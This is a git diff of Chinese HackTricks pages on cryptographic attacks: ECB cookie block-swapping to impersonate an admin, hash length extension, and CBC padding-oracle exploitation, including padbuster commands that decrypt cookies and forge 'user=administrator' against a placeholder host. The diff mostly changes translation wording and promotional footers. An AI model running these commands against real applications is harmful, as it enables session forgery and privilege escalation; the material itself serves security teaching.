gAAAAABWC9P7-9RsxTz_dwxh9-O2VUB7Ih8UCQL1_Zk4suxnkCvb26Ie4i8HSUJ4caHZuiNtjLl3qfmCv_fS3_VpjL7HxCz7_Q==
|
||||
|
@ -273,7 +270,7 @@ Key:
|
|||
```
|
||||
* [https://asecuritysite.com/encryption/ferdecode](https://asecuritysite.com/encryption/ferdecode)
|
||||
|
||||
### Samir 秘密分享
|
||||
### Samir 秘密共享
|
||||
|
||||
一个秘密被分成 X 部分,要恢复它,你需要 Y 部分(_Y <=X_)。
|
||||
```
|
||||
|
@ -294,16 +291,17 @@ Key:
|
|||
* [https://github.com/lockedbyte/cryptovenom](https://github.com/lockedbyte/cryptovenom)
|
||||
* [https://github.com/nccgroup/featherduster](https://github.com/nccgroup/featherduster)
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习AWS黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks培训AWS红队专家(ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks培训GCP红队专家(GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS Family**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**上关注**我们。
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,36 +1,37 @@
|
|||
{% hint style="success" %}
|
||||
学习并练习AWS黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks培训AWS红队专家(ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks培训GCP红队专家(GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
# ECB
|
||||
|
||||
(ECB) 电子密码本 - 对称加密方案,**将明文的每个块**替换为**密文块**。这是**最简单**的加密方案。其主要思想是将明文分割成**N位的块**(取决于输入数据块的大小、加密算法),然后使用唯一密钥加密(解密)每个明文块。
|
||||
(ECB) 电子密码本 - 对称加密方案,**用密文块替换明文块**。这是**最简单**的加密方案。其主要思想是将明文分割成**N位的块**(取决于输入数据块的大小、加密算法),然后使用唯一密钥加密(解密)每个明文块。
|
||||
|
||||
![](https://upload.wikimedia.org/wikipedia/commons/thumb/e/e6/ECB_decryption.svg/601px-ECB_decryption.svg.png)
|
||||
|
||||
使用ECB存在多个安全问题:
|
||||
使用ECB存在多个安全隐患:
|
||||
|
||||
* **加密消息中的块可以被移除**
|
||||
* **加密消息中的块可以被移动**
|
||||
|
||||
# 漏洞的检测
|
||||
|
||||
想象一下,您多次登录一个应用程序,**总是得到相同的cookie**。这是因为应用程序的cookie是**`<用户名>|<密码>`**。\
|
||||
然后,您创建两个新用户,两者都具有**相同的长密码**和**几乎相同的用户名**。\
|
||||
您发现**两个用户信息的8字节块**是**相同的**。然后,您想象这可能是因为正在使用**ECB**。
|
||||
想象一下,你多次登录一个应用程序,**总是得到相同的cookie**。这是因为应用程序的cookie是**`<用户名>|<密码>`**。\
|
||||
然后,你创建两个新用户,两者都有**相同的长密码**和**几乎相同的用户名**。\
|
||||
你发现**两个用户信息**的**8字节块**是**相同的**。然后,你想到这可能是因为正在使用**ECB**。
|
||||
|
||||
就像以下示例中一样。观察这**两个解码的cookie**中多次出现的块**`\x23U\xE45K\xCB\x21\xC8`**。
|
||||
就像在以下示例中一样。观察这**两个解码的cookie**中多次出现的块**`\x23U\xE45K\xCB\x21\xC8`**
|
||||
```
|
||||
\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8\x04\xB6\xE1H\xD1\x1E \xB6\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8+=\xD4F\xF7\x99\xD9\xA9
|
||||
|
||||
|
@ -38,7 +39,7 @@
|
|||
```
|
||||
这是因为这些 cookie 的**用户名和密码中包含多次字母"a"**(例如)。**不同的区块**是包含**至少 1 个不同字符**的区块(也许是分隔符"|"或用户名中的某些必要差异)。
|
||||
|
||||
现在,攻击者只需发现格式是`<用户名><分隔符><密码>`还是`<密码><分隔符><用户名>`。为了做到这一点,他只需**生成几个相似且较长的用户名和密码**,直到找到格式和分隔符的长度:
|
||||
现在,攻击者只需发现格式是`<用户名><分隔符><密码>`还是`<密码><分隔符><用户名>`。为了做到这一点,他只需**生成多个相似且较长的用户名和密码**,直到找到格式和分隔符的长度:
|
||||
|
||||
| 用户名长度: | 密码长度: | 用户名+密码长度: | 解码后的 Cookie 长度: |
|
||||
| ------------ | ---------- | ---------------- | ----------------------- |
|
||||
|
@ -57,7 +58,7 @@
|
|||
\x23U\xE45K\xCB\x21\xC8\xE0Vd8oE\x123\aO\x43T\x32\xD5U\xD4
|
||||
```
|
||||
我们可以看到先前使用只包含`a`的用户名创建的模式`\x23U\xE45K\xCB\x21\xC8`。\
|
||||
然后,您可以移除前8B块,就可以得到用户名为`admin`的有效cookie:
|
||||
然后,您可以移除第一个8B块,您将得到一个针对用户名`admin`的有效cookie:
|
||||
```
|
||||
\xE0Vd8oE\x123\aO\x43T\x32\xD5U\xD4
|
||||
```
|
||||
|
@ -67,13 +68,13 @@
|
|||
|
||||
因此,另一种冒充用户`admin`的方法是:
|
||||
|
||||
- 生成一个用户名:`len(<username>) + len(<delimiter) % len(block)`。使用`8B`的块大小,您可以生成名为`username `的用户名,使用分隔符`|`,块`<username><delimiter>`将生成2个8B块。
|
||||
- 生成一个用户名:`len(<username>) + len(<delimiter) % len(block)`。对于块大小为`8B`,可以生成名为`username `的用户名,使用分隔符`|`,块`<username><delimiter>`将生成2个8B块。
|
||||
- 然后,生成一个密码,填充包含我们想要冒充的用户名和空格的确切块数,例如:`admin `。
|
||||
|
||||
该用户的cookie将由3个块组成:前两个是用户名+分隔符的块,第三个是密码的块(伪装成用户名):`username |admin `。
|
||||
|
||||
**然后,只需用最后一个块替换第一个块,就可以冒充用户`admin`:`admin |username`**
|
||||
|
||||
# 参考
|
||||
## 参考
|
||||
|
||||
* [http://cryptowiki.net/index.php?title=Electronic_Code_Book\_(ECB)](http://cryptowiki.net/index.php?title=Electronic_Code_Book_\(ECB\))
|
||||
|
|
|
@ -1,42 +1,43 @@
|
|||
{% hint style="success" %}
|
||||
学习并练习AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
|
||||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
# 攻击摘要
|
||||
|
||||
想象一个服务器通过**将一个** **秘密** **附加**到一些已知的明文数据上,然后对该数据进行哈希来**签署**一些**数据**。如果您知道:
|
||||
想象一个服务器正在通过将一个**秘密**附加到一些已知明文数据上然后对该数据进行哈希来**签署**一些**数据**。如果你知道:
|
||||
|
||||
* **秘密的长度**(这也可以从给定长度范围内进行暴力破解)
|
||||
* **秘密的长度**(这也可以从给定长度范围内暴力破解)
|
||||
* **明文数据**
|
||||
* **算法(及其容易受到此攻击)**
|
||||
* **填充是已知的**
|
||||
* 通常会使用默认填充,因此如果满足其他3个要求,这也是可以的
|
||||
* 通常会使用默认填充,因此如果满足其他 3 个要求,这也是可以的
|
||||
* 填充取决于秘密+数据的长度,这就是为什么需要秘密的长度
|
||||
|
||||
那么,攻击者可以**附加** **数据**并为**先前数据+附加数据**生成有效的**签名**。
|
||||
那么,对于**攻击者**来说,就有可能**附加数据**并为**先前数据+附加数据**生成有效的**签名**。
|
||||
|
||||
## 如何实现?
|
||||
## 如何?
|
||||
|
||||
基本上,易受攻击的算法首先通过**哈希一个数据块**生成哈希,然后,**从**先前创建的**哈希**(状态)开始,它们**添加下一个数据块**并**对其进行哈希**。
|
||||
基本上,易受攻击的算法首先通过**哈希一个数据块**生成哈希,然后,从**先前**创建的**哈希**(状态)开始,它们**添加下一个数据块**并**对其进行哈希**。
|
||||
|
||||
然后,想象秘密是"secret",数据是"data","secretdata"的MD5是6036708eba0d11f6ef52ad44e8b74d5b。\
|
||||
然后,想象秘密是"secret",数据是"data","secretdata"的 MD5 是 6036708eba0d11f6ef52ad44e8b74d5b。\
|
||||
如果攻击者想要附加字符串"append",他可以:
|
||||
|
||||
* 生成64个"A"的MD5
|
||||
* 将先前初始化的哈希状态更改为6036708eba0d11f6ef52ad44e8b74d5b
|
||||
* 生成 64 个"A"的 MD5
|
||||
* 将先前初始化的哈希状态更改为 6036708eba0d11f6ef52ad44e8b74d5b
|
||||
* 附加字符串"append"
|
||||
* 完成哈希,生成的哈希将是**对"secret" + "data" + "填充" + "append"**的有效哈希
|
||||
* 完成哈希,生成的哈希将是一个**对于"secret" + "data" + "填充" + "append"**有效的哈希
|
||||
|
||||
## **工具**
|
||||
|
||||
|
@ -44,19 +45,20 @@
|
|||
|
||||
## 参考资料
|
||||
|
||||
您可以在[https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks)中找到对这种攻击的很好解释
|
||||
你可以在 [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks) 中找到对这种攻击的很好解释。
|
||||
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
|
||||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,69 +1,70 @@
|
|||
{% hint style="success" %}
|
||||
学习并练习AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
# CBC - 密码块链接
|
||||
|
||||
在CBC模式中,**前一个加密块被用作IV**与下一个块进行XOR运算:
|
||||
在 CBC 模式中,**前一个加密块被用作 IV** 与下一个块进行异或运算:
|
||||
|
||||
![CBC加密](https://defuse.ca/images/cbc\_encryption.png)
|
||||
![https://defuse.ca/images/cbc\_encryption.png](https://defuse.ca/images/cbc\_encryption.png)
|
||||
|
||||
要解密CBC,需要执行**相反的操作**:
|
||||
要解密 CBC,需要执行**相反的操作**:
|
||||
|
||||
![CBC解密](https://defuse.ca/images/cbc\_decryption.png)
|
||||
![https://defuse.ca/images/cbc\_decryption.png](https://defuse.ca/images/cbc\_decryption.png)
|
||||
|
||||
请注意需要使用**加密密钥**和**IV**。
|
||||
请注意,需要使用一个**加密密钥**和一个**IV**。
|
||||
|
||||
# 消息填充
|
||||
|
||||
由于加密是以**固定大小的块**进行的,通常需要在**最后一个块**中进行填充以完成其长度。\
|
||||
通常使用**PKCS7**,它生成一个填充,重复**所需的字节数**以**完成**该块。例如,如果最后一个块缺少3个字节,填充将是`\x03\x03\x03`。
|
||||
通常使用 **PKCS7**,它生成一个填充,**重复**所需的**字节数**以**完成**块。例如,如果最后一个块缺少 3 个字节,填充将是 `\x03\x03\x03`。
|
||||
|
||||
让我们看看一个**长度为8字节的2个块**的更多示例:
|
||||
让我们看看一个**长度为 8 字节的 2 个块**的更多示例:
|
||||
|
||||
| 字节 #0 | 字节 #1 | 字节 #2 | 字节 #3 | 字节 #4 | 字节 #5 | 字节 #6 | 字节 #7 | 字节 #0 | 字节 #1 | 字节 #2 | 字节 #3 | 字节 #4 | 字节 #5 | 字节 #6 | 字节 #7 |
|
||||
| byte #0 | byte #1 | byte #2 | byte #3 | byte #4 | byte #5 | byte #6 | byte #7 | byte #0 | byte #1 | byte #2 | byte #3 | byte #4 | byte #5 | byte #6 | byte #7 |
|
||||
| ------- | ------- | ------- | ------- | ------- | ------- | ------- | ------- | -------- | -------- | -------- | -------- | -------- | -------- | -------- | -------- |
|
||||
| P | A | S | S | W | O | R | D | 1 | 2 | 3 | 4 | 5 | 6 | **0x02** | **0x02** |
|
||||
| P | A | S | S | W | O | R | D | 1 | 2 | 3 | 4 | 5 | **0x03** | **0x03** | **0x03** |
|
||||
| P | A | S | S | W | O | R | D | 1 | 2 | 3 | **0x05** | **0x05** | **0x05** | **0x05** | **0x05** |
|
||||
| P | A | S | S | W | O | R | D | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** |
|
||||
|
||||
请注意,在最后一个示例中,**最后一个块已满,因此另一个仅包含填充的块被生成**。
|
||||
请注意,在最后一个示例中,**最后一个块已满,因此另一个仅带填充的块被生成**。
|
||||
|
||||
# 填充Oracle
|
||||
# 填充 Oracle
|
||||
|
||||
当应用程序解密加密数据时,它将首先解密数据;然后将删除填充。在清除填充时,如果**无效的填充触发可检测的行为**,则存在**填充Oracle漏洞**。可检测的行为可以是**错误**、**缺少结果**或**响应速度变慢**。
|
||||
当应用程序解密加密数据时,它将首先解密数据;然后将删除填充。在清除填充时,如果**无效的填充触发可检测的行为**,则存在**填充 Oracle 漏洞**。可检测的行为可以是一个**错误**,**缺少结果**或**响应较慢**。
|
||||
|
||||
如果检测到这种行为,您可以**解密加密数据**甚至**加密任何明文**。
|
||||
|
||||
## 如何利用
|
||||
|
||||
您可以使用[https://github.com/AonCyberLabs/PadBuster](https://github.com/AonCyberLabs/PadBuster)来利用这种漏洞,或者只需执行
|
||||
您可以使用 [https://github.com/AonCyberLabs/PadBuster](https://github.com/AonCyberLabs/PadBuster) 来利用这种漏洞,或者只需执行
|
||||
```
|
||||
sudo apt-get install padbuster
|
||||
```
|
||||
为了测试网站的 cookie 是否存在漏洞,您可以尝试:
|
||||
为了测试一个网站的 cookie 是否存在漏洞,你可以尝试:
|
||||
```bash
|
||||
perl ./padBuster.pl http://10.10.10.10/index.php "RVJDQrwUdTRWJUVUeBKkEA==" 8 -encoding 0 -cookies "login=RVJDQrwUdTRWJUVUeBKkEA=="
|
||||
```
|
||||
**编码 0** 意味着使用 **base64**(但其他选项也可用,请查看帮助菜单)。
|
||||
|
||||
您还可以**滥用此漏洞来加密新数据。例如,假设 cookie 的内容是 "**_**user=MyUsername**_**",然后您可以将其更改为 "\_user=administrator\_" 并在应用程序内提升权限。您也可以使用 `paduster` 指定 `-plaintext**` 参数来执行此操作:
|
||||
您还可以**滥用此漏洞来加密新数据。例如,假设 cookie 的内容是 "**_**user=MyUsername**_**",然后您可以将其更改为 "\_user=administrator\_" 并在应用程序内提升权限。您也可以使用 `paduster` 并指定 `-plaintext** 参数来执行此操作:
|
||||
```bash
|
||||
perl ./padBuster.pl http://10.10.10.10/index.php "RVJDQrwUdTRWJUVUeBKkEA==" 8 -encoding 0 -cookies "login=RVJDQrwUdTRWJUVUeBKkEA==" -plaintext "user=administrator"
|
||||
```
|
||||
如果网站存在漏洞,`padbuster`将自动尝试在出现填充错误时找到漏洞,但您也可以使用**-error**参数指定错误消息。
|
||||
如果网站存在漏洞,`padbuster`将在出现填充错误时自动尝试查找,但您也可以使用**-error**参数指定错误消息。
|
||||
```bash
|
||||
perl ./padBuster.pl http://10.10.10.10/index.php "" 8 -encoding 0 -cookies "hcon=RVJDQrwUdTRWJUVUeBKkEA==" -error "Invalid padding"
|
||||
```
|
||||
|
@ -75,7 +76,7 @@ perl ./padBuster.pl http://10.10.10.10/index.php "" 8 -encoding 0 -cookies "hcon
|
|||
|
||||
假设您有一些加密文本,占据了由**E0到E15**字节组成的**2个块**。\
|
||||
为了解密**最后一个**块(**E8**到**E15**),整个块通过“块密码解密”生成**中间字节I0到I15**。\
|
||||
最后,每个中间字节都与先前的加密字节(E0到E7)进行**XOR运算**。因此:
|
||||
最后,每个中间字节都与先前加密的字节(E0到E7)进行**XOR运算**。因此:
|
||||
|
||||
* `C15 = D(E15) ^ E7 = I15 ^ E7`
|
||||
* `C14 = I14 ^ E6`
|
||||
|
@ -89,7 +90,7 @@ perl ./padBuster.pl http://10.10.10.10/index.php "" 8 -encoding 0 -cookies "hcon
|
|||
|
||||
这使我们能够**计算C15**:`C15 = E7 ^ I15 = E7 ^ \x01 ^ E'7`
|
||||
|
||||
知道**C15**,现在可以**计算C14**,但这次要用` \x02\x02`来暴力破解填充。
|
||||
知道**C15**,现在可以**计算C14**,但这次是通过暴力破解填充`\x02\x02`。
|
||||
|
||||
这个BF与前一个一样复杂,因为可以计算出值为0x02的`E''15`:`E''7 = \x02 ^ I15`,所以只需要找到生成**`C14`等于`0x02`**的**`E'14`**。\
|
||||
然后,执行相同的步骤来解密C14:**`C14 = E6 ^ I14 = E6 ^ \x02 ^ E''6`**
|
||||
|
@ -99,26 +100,11 @@ perl ./padBuster.pl http://10.10.10.10/index.php "" 8 -encoding 0 -cookies "hcon
|
|||
## 漏洞检测
|
||||
|
||||
注册一个帐户并使用该帐户登录。\
|
||||
如果您**多次登录**并始终获得**相同的cookie**,则应用程序可能存在**问题**。每次登录时发送回的**cookie应该是唯一的**。如果cookie**始终**是**相同的**,它可能始终有效,**无法使其失效**。
|
||||
如果您**多次登录**并始终获得**相同的cookie**,则应用程序可能存在**问题**。每次登录时发送回的cookie应该是**唯一的**。如果cookie**始终**是**相同的**,那么它可能始终有效,**无法使其失效**。
|
||||
|
||||
现在,如果您尝试**修改**cookie,您会看到应用程序返回一个**错误**。\
|
||||
但是,如果您使用填充预言(例如使用padbuster)进行BF,您可以获得另一个适用于不同用户的有效cookie。这种情况很可能容易受到padbuster的攻击。
|
||||
但是,如果您使用填充预言(例如使用padbuster)进行BF,您将成功获得另一个适用于不同用户的有效cookie。这种情况很可能对padbuster易受攻击。
|
||||
|
||||
# 参考资料
|
||||
## 参考
|
||||
|
||||
* [https://en.wikipedia.org/wiki/Block\_cipher\_mode\_of\_operation](https://en.wikipedia.org/wiki/Block\_cipher\_mode\_of\_operation)
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF版HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 发现[**PEASS Family**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**上关注**我们。
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,22 +1,42 @@
|
|||
{% hint style="success" %}
|
||||
学习并练习AWS黑客:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP黑客:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
